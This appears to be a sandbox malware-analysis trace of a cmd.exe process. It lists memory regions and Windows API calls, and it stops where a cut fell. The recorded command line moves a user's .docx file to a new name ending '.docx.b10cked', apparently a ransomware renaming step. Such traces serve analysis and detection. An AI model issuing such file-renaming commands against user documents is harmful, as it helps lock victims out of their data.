region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14203 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14204 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14205 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14206 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14207 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14208 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 14209 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14210 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14211 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14212 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 14213 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 14214 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14215 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 14216 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 14217 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 192 os_tid = 0xc2c [0136.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc24 | out: lpSystemTimeAsFileTime=0x16fc24*(dwLowDateTime=0x8b5c1f20, dwHighDateTime=0x1d440a9)) [0136.617] GetCurrentProcessId () returned 0xc54 [0136.617] GetCurrentThreadId () returned 0xc2c [0136.617] GetTickCount () returned 0x2b28c [0136.617] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc1c | out: lpPerformanceCount=0x16fc1c*=19340650207) returned 1 [0136.618] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.618] __set_app_type (_Type=0x1) [0136.618] __p__fmode () returned 0x76b331f4 [0136.618] __p__commode () returned 0x76b331fc [0136.618] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.618] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.618] GetCurrentThreadId () returned 0xc2c [0136.618] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc2c) returned 0x38 [0136.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.619] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.619] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x16fbb4 | out: phkResult=0x16fbb4*=0x0) returned 0x2 [0136.619] VirtualQuery (in: lpAddress=0x16fbeb, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.619] GetConsoleOutputCP () returned 0x1b5 [0136.619] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.619] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.619] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.619] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.620] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0136.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.620] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.620] GetEnvironmentStringsW () returned 0x240168* [0136.620] FreeEnvironmentStringsW (penv=0x240168) returned 1 [0136.620] GetEnvironmentStringsW () returned 0x240168* [0136.620] FreeEnvironmentStringsW (penv=0x240168) returned 1 [0136.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x40) returned 0x0 [0136.620] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x90, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.620] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegCloseKey (hKey=0x40) returned 0x0 [0136.621] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x40) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: 
lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegCloseKey (hKey=0x40) returned 0x0 [0136.621] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636b [0136.621] srand (_Seed=0x5b88636b) [0136.621] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" [0136.621] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" [0136.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.621] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.622] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.622] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.622] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.622] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", 
_String2="CMDCMDLINE") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.622] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.622] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.622] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.622] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.622] GetEnvironmentStringsW () returned 0x2422b8* [0136.622] FreeEnvironmentStringsW (penv=0x2422b8) returned 1 [0136.622] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.622] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.622] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.622] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.622] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.622] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.622] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8f0, lpFilePart=0x16f8ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8ec*="Desktop") returned 0x18 [0136.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 
[0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 [0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 [0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.623] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.623] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.623] GetEnvironmentStringsW () returned 0x242ad8* [0136.623] FreeEnvironmentStringsW (penv=0x242ad8) returned 1 [0136.623] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.624] GetConsoleOutputCP () returned 0x1b5 [0136.624] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.624] GetUserDefaultLCID () returned 0x409 [0136.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa30, cchData=128 | out: lpLCData="1") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.625] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.626] GetConsoleTitleW (in: lpConsoleTitle=0x2308d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.626] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.627] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.627] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.627] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.627] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.627] _wcsicmp (_String1="IF/?", _String2="move") returned -4 
[0136.627] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.627] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.629] GetConsoleTitleW (in: lpConsoleTitle=0x16f728, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.629] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.629] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.629] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.629] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.630] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.630] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.630] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.630] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.630] _wcsicmp (_String1="move", _String2="VER") 
returned -9 [0136.630] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.630] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.630] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.630] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.631] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f4e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f4dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f4dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.632] _wcsnicmp 
(_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.633] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.633] _wcsnicmp (_String1="COPYCMD", 
_String2="windir=", _MaxCount=0x7) returned -20 [0136.633] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.633] _wcsicmp (_String1="2VGMMR~1.DOC", _String2=".") returned 4 [0136.633] _wcsicmp (_String1="2VGMMR~1.DOC", _String2="..") returned 4 [0136.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmr~1.doc")) returned 0x20 [0136.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.633] SetErrorMode (uMode=0x0) returned 0x0 [0136.633] SetErrorMode (uMode=0x1) returned 0x0 [0136.633] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", nBufferLength=0x104, lpBuffer=0x16ee6c, lpFilePart=0x16ee54 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", lpFilePart=0x16ee54*="2VGMMR~1.DOC") returned 0x26 [0136.633] SetErrorMode (uMode=0x0) returned 0x1 [0136.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.634] _wcsicmp (_String1="2VGMMR~1.DOC", _String2=".") returned 4 [0136.634] _wcsicmp (_String1="2VGMMR~1.DOC", _String2="..") returned 4 [0136.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmr~1.doc")) returned 0x20 [0136.634] SetErrorMode (uMode=0x0) returned 0x0 [0136.634] SetErrorMode (uMode=0x1) returned 0x0 [0136.634] GetFullPathNameW (in: 